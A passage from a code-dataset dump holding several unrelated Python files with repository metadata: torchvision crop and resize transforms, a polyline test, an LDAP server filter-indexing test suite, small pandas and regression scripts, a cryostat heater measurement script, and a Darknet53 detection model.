self.min_aspect_ratio = min_aspect_ratio\n self.max_aspect_ratio = max_aspect_ratio\n if sampler_options is None:\n sampler_options = [0.0, 0.1, 0.3, 0.5, 0.7, 0.9, 1.0]\n self.options = sampler_options\n self.trials = trials\n\n def _check_inputs(self, flat_inputs: List[Any]) -> None:\n if not (\n has_all(flat_inputs, features.BoundingBox)\n and has_any(flat_inputs, PIL.Image.Image, features.Image, features.is_simple_tensor)\n and has_any(flat_inputs, features.Label, features.OneHotLabel)\n ):\n raise TypeError(\n f\"{type(self).__name__}() requires input sample to contain Images or PIL Images, \"\n \"BoundingBoxes and Labels or OneHotLabels. Sample can also contain Masks.\"\n )\n\n def _get_params(self, flat_inputs: List[Any]) -> Dict[str, Any]:\n orig_h, orig_w = query_spatial_size(flat_inputs)\n bboxes = query_bounding_box(flat_inputs)\n\n while True:\n # sample an option\n idx = int(torch.randint(low=0, high=len(self.options), size=(1,)))\n min_jaccard_overlap = self.options[idx]\n if min_jaccard_overlap >= 1.0: # a value larger than 1 encodes the leave as-is option\n return dict()\n\n for _ in range(self.trials):\n # check the aspect ratio limitations\n r = self.min_scale + (self.max_scale - self.min_scale) * torch.rand(2)\n new_w = int(orig_w * r[0])\n new_h = int(orig_h * r[1])\n aspect_ratio = new_w / new_h\n if not (self.min_aspect_ratio <= aspect_ratio <= self.max_aspect_ratio):\n continue\n\n # check for 0 area crops\n r = torch.rand(2)\n left = int((orig_w - new_w) * r[0])\n top = int((orig_h - new_h) * r[1])\n right = left + new_w\n bottom = top + new_h\n if left == right or top == bottom:\n continue\n\n # check for any valid boxes with centers within the crop area\n xyxy_bboxes = F.convert_format_bounding_box(\n bboxes.as_subclass(torch.Tensor), bboxes.format, features.BoundingBoxFormat.XYXY\n )\n cx = 0.5 * (xyxy_bboxes[..., 0] + xyxy_bboxes[..., 2])\n cy = 0.5 * (xyxy_bboxes[..., 1] + xyxy_bboxes[..., 3])\n is_within_crop_area = (left < cx) & (cx < right) & (top < cy) & (cy < bottom)\n if not is_within_crop_area.any():\n continue\n\n # check at least 1 box with jaccard limitations\n xyxy_bboxes = xyxy_bboxes[is_within_crop_area]\n ious = box_iou(\n xyxy_bboxes,\n torch.tensor([[left, top, right, bottom]], dtype=xyxy_bboxes.dtype, device=xyxy_bboxes.device),\n )\n if ious.max() < min_jaccard_overlap:\n continue\n\n return dict(top=top, left=left, height=new_h, width=new_w, is_within_crop_area=is_within_crop_area)\n\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n if len(params) < 1:\n return inpt\n\n is_within_crop_area = params[\"is_within_crop_area\"]\n\n if isinstance(inpt, (features.Label, features.OneHotLabel)):\n return inpt.wrap_like(inpt, inpt[is_within_crop_area]) # type: ignore[arg-type]\n\n output = F.crop(inpt, top=params[\"top\"], left=params[\"left\"], height=params[\"height\"], width=params[\"width\"])\n\n if isinstance(output, features.BoundingBox):\n bboxes = output[is_within_crop_area]\n bboxes = F.clamp_bounding_box(bboxes, output.format, output.spatial_size)\n output = features.BoundingBox.wrap_like(output, bboxes)\n elif isinstance(output, features.Mask):\n # apply is_within_crop_area if mask is one-hot encoded\n masks = output[is_within_crop_area]\n output = features.Mask.wrap_like(output, masks)\n\n return output\n\n\nclass ScaleJitter(Transform):\n def __init__(\n self,\n target_size: Tuple[int, int],\n scale_range: Tuple[float, float] = (0.1, 2.0),\n interpolation: InterpolationMode = InterpolationMode.BILINEAR,\n antialias: 
Optional[bool] = None,\n ):\n super().__init__()\n self.target_size = target_size\n self.scale_range = scale_range\n self.interpolation = interpolation\n self.antialias = antialias\n\n def _get_params(self, flat_inputs: List[Any]) -> Dict[str, Any]:\n orig_height, orig_width = query_spatial_size(flat_inputs)\n\n scale = self.scale_range[0] + torch.rand(1) * (self.scale_range[1] - self.scale_range[0])\n r = min(self.target_size[1] / orig_height, self.target_size[0] / orig_width) * scale\n new_width = int(orig_width * r)\n new_height = int(orig_height * r)\n\n return dict(size=(new_height, new_width))\n\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n return F.resize(inpt, size=params[\"size\"], interpolation=self.interpolation, antialias=self.antialias)\n\n\nclass RandomShortestSize(Transform):\n def __init__(\n self,\n min_size: Union[List[int], Tuple[int], int],\n max_size: Optional[int] = None,\n interpolation: InterpolationMode = InterpolationMode.BILINEAR,\n antialias: Optional[bool] = None,\n ):\n super().__init__()\n self.min_size = [min_size] if isinstance(min_size, int) else list(min_size)\n self.max_size = max_size\n self.interpolation = interpolation\n self.antialias = antialias\n\n def _get_params(self, flat_inputs: List[Any]) -> Dict[str, Any]:\n orig_height, orig_width = query_spatial_size(flat_inputs)\n\n min_size = self.min_size[int(torch.randint(len(self.min_size), ()))]\n r = min_size / min(orig_height, orig_width)\n if self.max_size is not None:\n r = min(r, self.max_size / max(orig_height, orig_width))\n\n new_width = int(orig_width * r)\n new_height = int(orig_height * r)\n\n return dict(size=(new_height, new_width))\n\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n return F.resize(inpt, size=params[\"size\"], interpolation=self.interpolation, antialias=self.antialias)\n\n\nclass FixedSizeCrop(Transform):\n def __init__(\n self,\n size: Union[int, Sequence[int]],\n fill: Union[features.FillType, Dict[Type, features.FillType]] = 0,\n padding_mode: str = \"constant\",\n ) -> None:\n super().__init__()\n size = tuple(_setup_size(size, error_msg=\"Please provide only two dimensions (h, w) for size.\"))\n self.crop_height = size[0]\n self.crop_width = size[1]\n\n self.fill = _setup_fill_arg(fill)\n\n self.padding_mode = padding_mode\n\n def _check_inputs(self, flat_inputs: List[Any]) -> None:\n if not has_any(flat_inputs, PIL.Image.Image, features.Image, features.is_simple_tensor, features.Video):\n raise TypeError(\n f\"{type(self).__name__}() requires input sample to contain an tensor or PIL image or a Video.\"\n )\n\n if has_any(flat_inputs, features.BoundingBox) and not has_any(\n flat_inputs, features.Label, features.OneHotLabel\n ):\n raise TypeError(\n f\"If a BoundingBox is contained in the input sample, \"\n f\"{type(self).__name__}() also requires it to contain a Label or OneHotLabel.\"\n )\n\n def _get_params(self, flat_inputs: List[Any]) -> Dict[str, Any]:\n height, width = query_spatial_size(flat_inputs)\n new_height = min(height, self.crop_height)\n new_width = min(width, self.crop_width)\n\n needs_crop = new_height != height or new_width != width\n\n offset_height = max(height - self.crop_height, 0)\n offset_width = max(width - self.crop_width, 0)\n\n r = torch.rand(1)\n top = int(offset_height * r)\n left = int(offset_width * r)\n\n bounding_boxes: Optional[torch.Tensor]\n try:\n bounding_boxes = query_bounding_box(flat_inputs)\n except ValueError:\n bounding_boxes = None\n\n if needs_crop and bounding_boxes is not 
None:\n format = bounding_boxes.format\n bounding_boxes, spatial_size = F.crop_bounding_box(\n bounding_boxes.as_subclass(torch.Tensor),\n format=format,\n top=top,\n left=left,\n height=new_height,\n width=new_width,\n )\n bounding_boxes = F.clamp_bounding_box(bounding_boxes, format=format, spatial_size=spatial_size)\n height_and_width = F.convert_format_bounding_box(\n bounding_boxes, old_format=format, new_format=features.BoundingBoxFormat.XYWH\n )[..., 2:]\n is_valid = torch.all(height_and_width > 0, dim=-1)\n else:\n is_valid = None\n\n pad_bottom = max(self.crop_height - new_height, 0)\n pad_right = max(self.crop_width - new_width, 0)\n\n needs_pad = pad_bottom != 0 or pad_right != 0\n\n return dict(\n needs_crop=needs_crop,\n top=top,\n left=left,\n height=new_height,\n width=new_width,\n is_valid=is_valid,\n padding=[0, 0, pad_right, pad_bottom],\n needs_pad=needs_pad,\n )\n\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n if params[\"needs_crop\"]:\n inpt = F.crop(\n inpt,\n top=params[\"top\"],\n left=params[\"left\"],\n height=params[\"height\"],\n width=params[\"width\"],\n )\n\n if params[\"is_valid\"] is not None:\n if isinstance(inpt, (features.Label, features.OneHotLabel, features.Mask)):\n inpt = inpt.wrap_like(inpt, inpt[params[\"is_valid\"]]) # type: ignore[arg-type]\n elif isinstance(inpt, features.BoundingBox):\n inpt = features.BoundingBox.wrap_like(\n inpt,\n F.clamp_bounding_box(inpt[params[\"is_valid\"]], format=inpt.format, spatial_size=inpt.spatial_size),\n )\n\n if params[\"needs_pad\"]:\n fill = self.fill[type(inpt)]\n inpt = F.pad(inpt, params[\"padding\"], fill=fill, padding_mode=self.padding_mode)\n\n return inpt\n\n\nclass RandomResize(Transform):\n def __init__(\n self,\n min_size: int,\n max_size: int,\n interpolation: InterpolationMode = InterpolationMode.BILINEAR,\n antialias: Optional[bool] = None,\n ) -> None:\n super().__init__()\n self.min_size = min_size\n self.max_size = max_size\n self.interpolation = interpolation\n self.antialias = antialias\n\n def _get_params(self, flat_inputs: List[Any]) -> Dict[str, Any]:\n size = int(torch.randint(self.min_size, self.max_size, ()))\n return dict(size=[size])\n\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n return F.resize(inpt, params[\"size\"], interpolation=self.interpolation, antialias=self.antialias)\n","repo_name":"gavrilenkoof/opencv_test","sub_path":"models/pytorch_vision_main/torchvision/prototype/transforms/_geometry.py","file_name":"_geometry.py","file_ext":"py","file_size_in_byte":33499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25825571545","text":"# -*- coding: utf-8 -*-\n''' Test getIVectorAtLength, getJVectorAtLength and getKVectorAtLength \n methods.'''\n\nfrom __future__ import print_function\n\n__author__= \"Luis C. 
Pérez Tato (LCPT)\"\n__copyright__= \"Copyright 2022, LCPT\"\n__license__= \"GPL\"\n__version__= \"3.0\"\n__email__= \"l.pereztato@gmail.com\"\n\nimport math\nimport geom\nimport json\nimport os\n\ndef computeMaxAngle(pline3d):\n ''' Return the maximum angle between contiguous vertices for the given\n 3D polyline.\n '''\n vertices= pline3d.getVertexList()\n p0= vertices[0]\n iVectors= list()\n for p1 in vertices[1:]:\n s= geom.Segment3d(p0, p1)\n iVectors.append(s.getIVector)\n p0= p1\n\n iV0= iVectors[0]\n maxAngle= 0.0\n for iV in iVectors[1:]:\n maxAngle= max(maxAngle, iV.getAngle(iV0))\n iV0= iV\n return maxAngle\n\npth= os.path.dirname(__file__)\nif(not pth):\n pth= \".\"\nverticesFilePath= pth+'/../../../aux/polyline3d_test_points.json'\n\ncoordinateData= open(verticesFilePath, 'r')\ncoordinateValues= json.load(coordinateData)\ncoordinateData.close()\nvertices= list()\nfor coo in coordinateValues:\n vertices.append(geom.Pos3d(coo[0], coo[1], coo[2]))\n\n\n\n# Define polyline.\npline3d= geom.Polyline3d(vertices)\nlengthBefore= pline3d.getLength()\nnvBefore= pline3d.getNumVertices()\n## Remove repeated vertices.\ntol= lengthBefore/1e4\npline3d.removeRepeatedVertexes(tol)\nlength= pline3d.getLength()\nnv= pline3d.getNumVertices()\n\nlengthDiff= abs(lengthBefore-length)\nnvDiff= nvBefore-nv\n\nokRepeatedVertexes= (nvDiff==1) and (abs(lengthDiff)<1e-12)\n\n# Remove little imperfections.\nmaxAngleBefore= computeMaxAngle(pline3d) # Compute max. angle between contiguous segments.\npline3d.simplify(0.15) # Simplify the polyline\nmaxAngle= computeMaxAngle(pline3d)\n\nokImperfections= (maxAngle=FFFFFFFFFFFFFFFF))\",\n \"(&(sn>=0000000000000000)(sn<=1111111111111111))\",\n \"(&(sn>=0000000000000000)(givenname<=FFFFFFFFFFFFFFFF))\"]\n\nINDEXES = [\"(uidNumber=18446744073709551617)\",\n \"(gidNumber=18446744073709551617)\",\n \"(MYINTATTR=18446744073709551617)\",\n \"(&(uidNumber=*)(!(uidNumber=18446744073709551617)))\",\n \"(&(gidNumber=*)(!(gidNumber=18446744073709551617)))\",\n \"(&(uidNumber=*)(!(gidNumber=18446744073709551617)))\",\n \"(&(myintattr=*)(!(myintattr=18446744073709551617)))\",\n \"(uidNumber>=-18446744073709551617)\",\n \"(gidNumber>=-18446744073709551617)\",\n \"(uidNumber<=18446744073709551617)\",\n \"(gidNumber<=18446744073709551617)\",\n \"(myintattr<=18446744073709551617)\"]\n\n\nINDEXES_FALSE = [\"(gidNumber=54321)\",\n \"(uidNumber=54321)\",\n \"(myintattr=54321)\",\n \"(gidNumber<=-999999999999999999999999999999)\",\n \"(uidNumber<=-999999999999999999999999999999)\",\n \"(myintattr<=-999999999999999999999999999999)\",\n \"(gidNumber>=999999999999999999999999999999)\",\n \"(uidNumber>=999999999999999999999999999999)\",\n \"(myintattr>=999999999999999999999999999999)\"]\n\n\n@pytest.fixture(scope=\"module\")\ndef _create_entries(topo):\n \"\"\"\n Will create necessary users for this script.\n \"\"\"\n # Creating Users\n users_people = UserAccounts(topo.standalone, DEFAULT_SUFFIX)\n\n for count in range(3):\n users_people.create(properties={\n 'ou': ['Accounting', 'People'],\n 'cn': f'User {count}F',\n 'sn': f'{count}' * 16,\n 'givenname': 'FFFFFFFFFFFFFFFF',\n 'uid': f'user{count}F',\n 'mail': f'user{count}F@test.com',\n 'manager': f'uid=user{count}F,ou=People,{DEFAULT_SUFFIX}',\n 'userpassword': PW_DM,\n 'homeDirectory': '/home/' + f'user{count}F',\n 'uidNumber': '1000',\n 'gidNumber': '2000',\n })\n\n cos = CosTemplates(topo.standalone, DEFAULT_SUFFIX, rdn='ou=People')\n for user, number, des in [('a', '18446744073709551617', '2^64+1'),\n ('b', '18446744073709551618', 
'2^64+1'),\n ('c', '-18446744073709551617', '-2^64+1'),\n ('d', '-18446744073709551618', '-2^64+1'),\n ('e', '0', '0'),\n ('f', '2', '2'),\n ('g', '-2', '-2')]:\n cos.create(properties={\n 'cn': user,\n 'uidnumber': number,\n 'gidnumber': number,\n 'myintattr': number,\n 'description': f'uidnumber value {des} - gidnumber is same but not indexed'\n })\n\n\n@pytest.mark.parametrize(\"real_value\", FILTERS)\ndef test_positive(topo, _create_entries, real_value):\n \"\"\"Test positive filters\n\n :id: 57243326-91ae-11e9-aca3-8c16451d917b\n :parametrized: yes\n :setup: Standalone\n :steps:\n 1. Try to pass filter rules as per the condition .\n :expectedresults:\n 1. Pass\n \"\"\"\n assert Accounts(topo.standalone, DEFAULT_SUFFIX).filter(real_value)\n\n\ndef test_indexing_schema(topo, _create_entries):\n \"\"\"Test with schema\n\n :id: 67a2179a-91ae-11e9-9a33-8c16451d917b\n :setup: Standalone\n :steps:\n 1. Add attribute types to Schema.\n 2. Try to pass filter rules as per the condition .\n :expectedresults:\n 1. Pass\n 2. Pass\n \"\"\"\n cos = CosTemplates(topo.standalone, DEFAULT_SUFFIX, rdn='ou=People')\n Schema(topo.standalone).add('attributetypes',\n \"( 8.9.10.11.12.13.14.15 NAME 'myintattr' DESC 'for integer \"\n \"syntax index ordering testing' EQUALITY integerMatch ORDERING \"\n \"integerOrderingMatch SYNTAX 1.3.6.1.4.1.1466.115.121.1.27 )\")\n topo.standalone.restart()\n assert cos.filter(\"(myintattr>=-18446744073709551617)\")\n\n\n@pytest.mark.parametrize(\"real_value\", INDEXES)\ndef test_indexing(topo, _create_entries, real_value):\n \"\"\"Test positive index filters\n\n :id: 7337589a-91ae-11e9-ad44-8c16451d917b\n :parametrized: yes\n :setup: Standalone\n :steps:\n 1. Try to pass filter rules as per the condition .\n :expectedresults:\n 1. Pass\n \"\"\"\n cos = CosTemplates(topo.standalone, DEFAULT_SUFFIX, rdn='ou=People')\n assert cos.filter(real_value)\n\n\n@pytest.mark.parametrize(\"real_value\", INDEXES_FALSE)\ndef test_indexing_negative(topo, _create_entries, real_value):\n \"\"\"Test negative index filters\n\n :id: 7e19deae-91ae-11e9-900c-8c16451d917b\n :parametrized: yes\n :setup: Standalone\n :steps:\n 1. Try to pass negative filter rules as per the condition .\n :expectedresults:\n 1. 
Fail\n \"\"\"\n cos = CosTemplates(topo.standalone, DEFAULT_SUFFIX, rdn='ou=People')\n assert not cos.filter(real_value)\n\n\nif __name__ == '__main__':\n CURRENT_FILE = os.path.realpath(__file__)\n pytest.main(\"-s -v %s\" % CURRENT_FILE)\n","repo_name":"389ds/389-ds-base","sub_path":"dirsrvtests/tests/suites/filter/filter_indexing_test.py","file_name":"filter_indexing_test.py","file_ext":"py","file_size_in_byte":5773,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"31"} +{"seq_id":"16488293891","text":"#Saurav Hossain\n#09/21/18\n'''\nAsk the user for the name of the input file.\nAsk the user for the attribute (column header) to search by.\n'''\n\n#Taken from lab and edited\n#Import pandas for reading and analyzing CSV data:\nimport pandas as pd\n\nx = input() \nss = input()\n \ntickets = pd.read_csv(x)\nprint(\"The 10 worst offenders are:\")\nprint(tickets[ss].value_counts()[:10]) #Print out the dataframe","repo_name":"SauravShoaeib/College","sub_path":"CS_127/Python/parking_ticket.py","file_name":"parking_ticket.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6084412063","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 29 17:38:08 2018\n\n@author: Nik\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndataset = pd.read_csv('50_Startups.csv')\n\nX = dataset.iloc[:,:-1].values\ny = dataset.iloc[:,-1].values\n\nfrom sklearn.preprocessing import LabelEncoder,OneHotEncoder\nlabelencoder_X = LabelEncoder()\nX[:,-1] = labelencoder_X.fit_transform(X[:,-1])\nonehotencoder = OneHotEncoder(categorical_features=[3])\nX = onehotencoder.fit_transform(X).toarray()\n\n#dummy variable\nX = X[:,1:]\n\nimport statsmodels.formula.api as sm\nX = np.append(arr = np.ones((50,1)).astype(int),values = X,axis =1)\nX_opt = X[:,[0,1,2,3,4,5]]\n\ndef backward_elimination(x,sl):\n for i in range(len(x[0])):\n regressor_OLS = sm.OLS(endog = y ,exog = x).fit()\n p_values = regressor_OLS.pvalues\n max_p_value = max(p_values)\n index_maxp = list(p_values).index(max_p_value)\n if max_p_value>sl:\n x = np.delete(x,index_maxp,1)\n else:\n return x\n \nX_modeled = backward_elimination(X_opt,0.05)\n\nfrom sklearn.model_selection import train_test_split\nX_train,X_test,y_train,y_test = train_test_split(X_modeled,y,test_size = 0.2,random_state = 42)\n\n\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor.fit(X_train,y_train)\ny_pred = regressor.predict(X_test)\n\nprint(y_pred[0:2])\n","repo_name":"NikhilArroju/mlcodepractice","sub_path":"Regression/nik_multreg.py","file_name":"nik_multreg.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18074374382","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 13 13:46:22 2018\n\n@author: jlm7\n\"\"\"\n\nfrom ka3305p import ka3305p\nfrom srs_sim970 import SIM970\nimport time\nimport matplotlib.pyplot as plt\nimport client\nimport math\nimport numpy as np\nfrom tqdm import tqdm\nimport datetime\n\n\n\n# SEE THIS LINK FOR USEFUL INSTRUCTIONS\n# https://qittlab-nuc-01.campus.nist.gov/wordpress/wp-admin/post.php?post=5878&action=edit\n#%% INITIALIZATION AND SETUP\n\n#Create objects for the voltage source and voltmeter\nsource = ka3305p('COM8')\nvoltmeter = SIM970('GPIB0::4',7)\n\n#Set impedence for the voltmeter channels being used 
\nvoltmeter.set_impedance(True,channel=1)\nvoltmeter.set_impedance(True,channel=2)\n#voltmeter.set_impedance(True,channel=3)\n#voltmeter.set_impedance(True,channel=4)\nsource.set_output(on=False)\n\n#%%Initialize variables with what will be used. \n\n#******************************************************************************\n# NOTE: NOTHING HERE NEEDS TO BE CHANGED. HOWEVER...\n# YOU CAN CHANGE THE POWER DELIVERED TO THE STAGE WITH THE power_wanted VARIABLE HOWEVER IT CAN BE LEFT AT 2\n# YOU CAN ALSO CHANGE THE WAIT TIME BEFORE THE HEATER TURNS ON WITH cur_time HOWEVER IT CAN BE LEFT AT -10 \n# YOU CAN ALSO CHANGE THE run_time VARIABLE WHICH SETS HOW LONG THE TEMPERATURE WILL BE MESAURED FOR\n# YOU CAN ALSO CHANGE THE CHANNEL FOR THE VOLTAGE SOURCE OR VOLTMETER MEASUREMENTS\n# YOU CAN ALSO CHANGE THE VALUE OF THE SERIES RESISTOR ON YOUR CIRCUIT WITH series_resistance\n#******************************************************************************\n\npre_heat_time = 10 #waits this long before turning on the heater. 10 means it waits 10 seconds and then turns on the heater\npower_wanted = 2 #this is the watts delivered to the heater\nrun_time = 10000 #this is the number of seconds the test will run for (note, it will go this long to heat, and this long to cool) total test = 2* runtime\nvoltage_source_channel = 1 # this is the channel on the voltmeter you plugged the heater resistor into\nvoltmeter_series_voltage_channel = 1 # this is the voltmeter channel connected to the series resistor (NOT TO THE CRYOSTAT)\nvoltmeter_resistor_voltage_channel = 2 # this is the voltmeter channel connected to the resistor in the cryostat\nseries_resistance = 10 # this is the value of the resistor connected in series to the voltage source(should be 10 ohm)\n\n# DON'T CHANGE ANY OF THESE VARIABLES\ntemp_4K = []\ntemp_40K = []\nseries_voltage_40K = []\npower_resistor_voltage_40K = []\nseries_current_40K = []\navg_powers = []\ntime_array = []\nset_voltage = 1.2*math.sqrt(50 * power_wanted)\ncur_time = 0\n\n#%% TURN ON THE VOLTAGE SOURCE -> NOTHING NEEDS TO BE CHANGED IN HERE FOR YOUR SETTINGS\ntime.sleep(2)\nsource.set_voltage(channel=voltage_source_channel, voltage=round(set_voltage,2))\ntime.sleep(2)\n\n#%% BEGIN MEASURING TEMP DATA BEFORE THE HEATER TURNS ON -> NOTHING NEEDS TO BE CHANGED IN HERE FOR YOUR SETTINGS\n\nprint(\"Begin Data collection no heat\")\nstart_time = time.time()\n# Make a status bar for the user to follow\nwith tqdm(total=pre_heat_time, unit=\"s\") as pbar:\n cur_time = time.time()\n while (cur_time < start_time + pre_heat_time):\n all_temps = client.client('132.163.53.67',50326,'getall').decode('ascii').split(',')\n temp_4K.append(float(all_temps[5]))\n temp_40K.append(float(all_temps[6]))\n time_array.append(cur_time - start_time)\n prev_time = cur_time\n cur_time = time.time()\n pbar.update(cur_time - prev_time)\n\n\n \n#%% BEGIN MEAUREING TEMP DATA AFTER THE HEATER TURNS ON -> NOTHING NEEDS TO BE CHANGED IN HERE FOR YOUR SETTINGS\nsource.set_output(on=True)\nprint(\"\\n\\nBegin heating Loop\")\nwith tqdm(total=run_time, unit=\"s\") as pbar: # CHANGE THIS TO ADJUST TOTAL MEASUREMENT TIME\n cur_time = time.time()\n while (cur_time < start_time + pre_heat_time + run_time):\n all_temps = client.client('132.163.53.67',50326,'getall').decode('ascii').split(',')\n temp_4K.append(float(all_temps[5]))\n temp_40K.append(float(all_temps[6]))\n #this is incremented due to the average run time of each of these loops\n time_array.append(cur_time - start_time)\n series_v_read = 
voltmeter.read_voltage(channel = voltmeter_series_voltage_channel)\n r_voltage = voltmeter.read_voltage(channel = voltmeter_resistor_voltage_channel)\n s_current = (set_voltage - series_v_read) / series_resistance\n series_voltage_40K.append(series_v_read)\n power_resistor_voltage_40K.append(r_voltage)\n series_current_40K.append(s_current)\n avg_powers.append(s_current * r_voltage)\n prev_time = cur_time\n cur_time = time.time()\n pbar.update(cur_time - prev_time)\n\n \nsource.set_output(on=False)\noff_time = time.time() - start_time\n\n# Now run the cooling loop\nprint(\"\\n\\nBegin Cooling Loop\")\nwith tqdm(total=run_time, unit=\"s\") as pbar: # CHANGE THIS TO ADJUST TOTAL MEASUREMENT TIME\n cur_time = time.time()\n while (cur_time < off_time + start_time + run_time):\n all_temps = client.client('132.163.53.67',50326,'getall').decode('ascii').split(',')\n temp_4K.append(float(all_temps[5]))\n temp_40K.append(float(all_temps[6]))\n #this is incremented due to the average run time of each of these loops\n time_array.append(cur_time - start_time)\n series_v_read = voltmeter.read_voltage(channel = voltmeter_series_voltage_channel)\n r_voltage = voltmeter.read_voltage(channel = voltmeter_resistor_voltage_channel)\n s_current = (set_voltage - series_v_read) / series_resistance\n series_voltage_40K.append(series_v_read)\n power_resistor_voltage_40K.append(r_voltage)\n series_current_40K.append(s_current)\n avg_powers.append(s_current * r_voltage)\n prev_time = cur_time\n cur_time = time.time()\n pbar.update(cur_time - prev_time)\n\n#%% CREATE THE GRAPH WHICH WILL SHOW THE TEMPEREATURE DATA vs TIME -> MAKE SURE TO CHANGE THE GRAPH LABEL DEPENDING ON WHERE THE POWER WAS APPLIED\n#*****************************************************************************\n# NOTE:\n# CHANGE THE TITLE TO CORRESPOND TO WHERE THE POWER WAS APPLIED\n# DONT CHANGE THE Y LABELS\n\n#*****************************************************************************\n\nprint(\"Avg Power: \", np.mean(avg_powers))\nfig = plt.figure()\nax1 = fig.add_subplot(111)\nax2 = ax1.twinx()\nax1.plot(time_array, temp_4K, '-ro')\nax1.set_xlabel(\"Time (s)\")\nax1.set_ylabel(\"Temperature in 4K(K)\",color='r')\nax1.set_title(\"Temperature Applied in 40K\")\nax2.plot(time_array, temp_40K, '-bo')\nplt.axvline(x = off_time, color='k', linestyle='--')\nplt.text(off_time+1, 4.5, \"Power Off\", rotation=90)\nax2.set_ylabel(\"Temperature in 40K(K)\", color='b')\nax1.legend(loc=\"best\")\nax1.margins(0.1)\nfig.tight_layout()\nnow = datetime.datetime.now()\nstring = \"images/\" + now.strftime(\"%Y-%m-%d-%H-%M\") + \".png\"\nplt.savefig(string)\n\nsource.close()","repo_name":"melonisj/python-nist","sub_path":"heat_map/temp_settle.py","file_name":"temp_settle.py","file_ext":"py","file_size_in_byte":6941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41339073240","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass ConvolutionalLayer(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, stride, padding):\n super(ConvolutionalLayer, self).__init__()\n self.conv = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding),\n nn.BatchNorm2d(out_channels),\n nn.LeakyReLU(0.1)\n )\n def forward(self, x):\n return self.conv(x)\n\nclass ResidualLayer(nn.Module):\n def __init__(self, in_channels):\n super(ResidualLayer, self).__init__()\n self.resblock = nn.Sequential(\n ConvolutionalLayer(in_channels, in_channels // 2, 
kernel_size=1, stride=1, padding=0),\n ConvolutionalLayer(in_channels // 2,in_channels,kernel_size=3,stride=1,padding=1)\n )\n\n def forward(self, x):\n return x + self.resblock(x)\n\nclass DownSampleLayer(nn.Module):\n def __init__(self, in_channels, out_channels):\n super(DownSampleLayer, self).__init__()\n self.conv = nn.Sequential(\n ConvolutionalLayer(in_channels, out_channels, kernel_size=3, stride=2, padding=1)\n )\n\n def forward(self, x):\n return self.conv(x)\n\nclass UpSampleLayer(nn.Module):\n def __init__(self):\n super(UpSampleLayer, self).__init__()\n\n def forward(self, x):\n return F.interpolate(x, scale_factor=2, mode=\"nearest\")\n\nclass ConvolutionalSetLayer(nn.Module):\n def __init__(self, in_channels, out_channels):\n super(ConvolutionalSetLayer, self).__init__()\n self.conv = nn.Sequential(\n ConvolutionalLayer(in_channels, out_channels, kernel_size=1, stride=1, padding=0),\n ConvolutionalLayer(out_channels, in_channels, kernel_size=3, stride=1, padding=1),\n ConvolutionalLayer(in_channels, out_channels, kernel_size=1, stride=1, padding=0),\n ConvolutionalLayer(out_channels, in_channels, kernel_size=3, stride=1, padding=1),\n ConvolutionalLayer(in_channels, out_channels, kernel_size=1,stride=1, padding=0)\n )\n\n def forward(self, x):\n return self.conv(x)\n\nclass Darknet53(nn.Module):\n def __init__(self,num_classes):\n super(Darknet53, self).__init__()\n\n self.num_classes = num_classes\n\n self.feature_52 = nn.Sequential(\n ConvolutionalLayer(3, 32, 3, 1, 1), # 3x3 卷积\n DownSampleLayer(32, 64), # 下采样\n\n ResidualLayer(64),\n\n DownSampleLayer(64, 128), # 3x3 ,strid=2,下采样\n\n ResidualLayer(128),\n ResidualLayer(128),\n\n DownSampleLayer(128, 256), # 下采样\n\n ResidualLayer(256),\n ResidualLayer(256),\n ResidualLayer(256),\n ResidualLayer(256),\n ResidualLayer(256),\n ResidualLayer(256),\n ResidualLayer(256),\n ResidualLayer(256)\n ) # 尺寸为52 x 52的特征图\n\n self.feature_26 = nn.Sequential(\n DownSampleLayer(256, 512),\n ResidualLayer(512),\n ResidualLayer(512),\n ResidualLayer(512),\n ResidualLayer(512),\n ResidualLayer(512),\n ResidualLayer(512),\n ResidualLayer(512),\n ResidualLayer(512)\n ) # 尺寸为26x26的特征图\n\n self.feature_13 = nn.Sequential(\n DownSampleLayer(512, 1024), # 下采样\n ResidualLayer(1024),\n ResidualLayer(1024),\n ResidualLayer(1024),\n ResidualLayer(1024))\n\n self.convolset_13 = nn.Sequential(\n ConvolutionalSetLayer(1024,512)\n )\n\n self.convolset_26 = nn.Sequential(\n ConvolutionalSetLayer(768,256)\n )\n\n self.convolset_52 = nn.Sequential(\n ConvolutionalSetLayer(384,128)\n )\n\n self.detection_13 = nn.Sequential(\n ConvolutionalLayer(512, 1024, 3, 1, 1),\n nn.Conv2d(1024,(5 + self.num_classes)*3,1,1,0)\n ) # detection 13 x 13\n\n self.detection_26 = nn.Sequential(\n ConvolutionalLayer(256, 512, 3, 1, 1),\n nn.Conv2d(512,(5 + self.num_classes)*3,1,1,0)\n ) # detection 26 x 26\n\n self.detection_52 = nn.Sequential(\n ConvolutionalLayer(128, 256, 3, 1, 1),\n nn.Conv2d(256,(5 + self.num_classes)*3,1,1,0)\n ) # detection 52 x 52\n\n self.up_26 = nn.Sequential(\n ConvolutionalLayer(512, 256, 1, 1, 0),\n UpSampleLayer()\n ) # upsample 13->26\n\n self.up_52 = nn.Sequential(\n ConvolutionalLayer(256, 128, 1, 1, 0),\n UpSampleLayer()\n ) # upsample 26->52\n\n def forward(self, x):\n h_52 = 